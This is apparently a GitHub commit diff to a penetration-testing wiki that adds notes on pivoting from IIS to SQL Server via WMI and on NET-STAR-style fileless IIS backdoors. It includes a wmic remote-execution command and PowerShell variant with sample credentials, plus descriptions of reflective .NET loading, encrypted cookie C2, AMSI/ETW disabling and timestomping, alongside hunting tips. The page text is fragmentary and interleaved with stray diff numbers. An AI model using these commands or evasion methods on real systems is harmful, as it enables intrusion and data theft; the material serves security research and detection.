You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.
6
6
@@ -210,4 +210,4 @@ Notes for exploitation research
210
210
-[Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
211
211
-[Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
Operators can pivot from an IIS/app tier to SQL Servers using WMI to execute a small batch that authenticates to MSSQL and runs ad‑hoc queries, exporting results to CSV. This keeps collection simple and blends with admin activity.
259
+
260
+
Example mssq.bat
261
+
```bat
262
+
@echo off
263
+
rem Usage: mssq.bat <server><user><pass><"SQL"><out.csv>
264
+
set S=%1
265
+
set U=%2
266
+
set P=%3
267
+
set Q=%4
268
+
set O=%5
269
+
rem Remove headers, trim trailing spaces, CSV separator = comma
wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
276
+
```
277
+
278
+
PowerShell alternative
279
+
```powershell
280
+
$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Copy file name to clipboardExpand all lines: src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+102Lines changed: 102 additions & 0 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -229,8 +229,105 @@ If you have filesystem or interactive access on the web server, co-located keys
229
229
230
230
With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised.
231
231
232
+
## IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
233
+
234
+
The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation entirely inside w3wp.exe. The core ideas are broadly reusable for custom tradecraft and for detection/hunting.
235
+
236
+
Key building blocks
237
+
- ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) carries a Base64‑encoded, optionally Gzip‑compressed .NET DLL. Upon a trigger request it decodes, decompresses and reflectively loads it into the current AppDomain and invokes the main entry point (e.g., ServerRun.Run()).
238
+
- Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results are wrapped with Gzip → AES‑ECB/PKCS7 → Base64 and moved via seemingly legitimate cookie‑heavy requests; operators used stable delimiters (e.g., "STAR") for chunking.
239
+
- Reflective .NET execution: accept arbitrary managed assemblies as Base64, load via Assembly.Load(byte[]) and pass operator args for rapid module swaps without touching disk.
240
+
- Operating in precompiled ASP.NET sites: add/manage auxiliary shells/backdoors even when the site is precompiled (e.g., dropper adds dynamic pages/handlers or leverages config handlers) – exposed by commands such as bypassPrecompiledApp, addshell, listshell, removeshell.
241
+
- Timestomping/metadata forgery: expose a changeLastModified action and timestomp on deployment (including future compilation timestamps) to hinder DFIR.
242
+
- Optional AMSI/ETW pre‑disable for loaders: a second‑stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in‑memory payloads.
- Repeated delimiters like "STAR" in traffic; mismatched or even future timestamps on ASPX/assemblies.
327
+
232
328
## Old IIS vulnerabilities worth looking for
233
329
330
+
234
331
### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure
235
332
236
333
You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
@@ -300,4 +397,9 @@ HTTP/1.1 401 Unauthorized
300
397
HTTP/1.1200OK
301
398
```
302
399
400
+
## References
401
+
402
+
-[Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
0 commit comments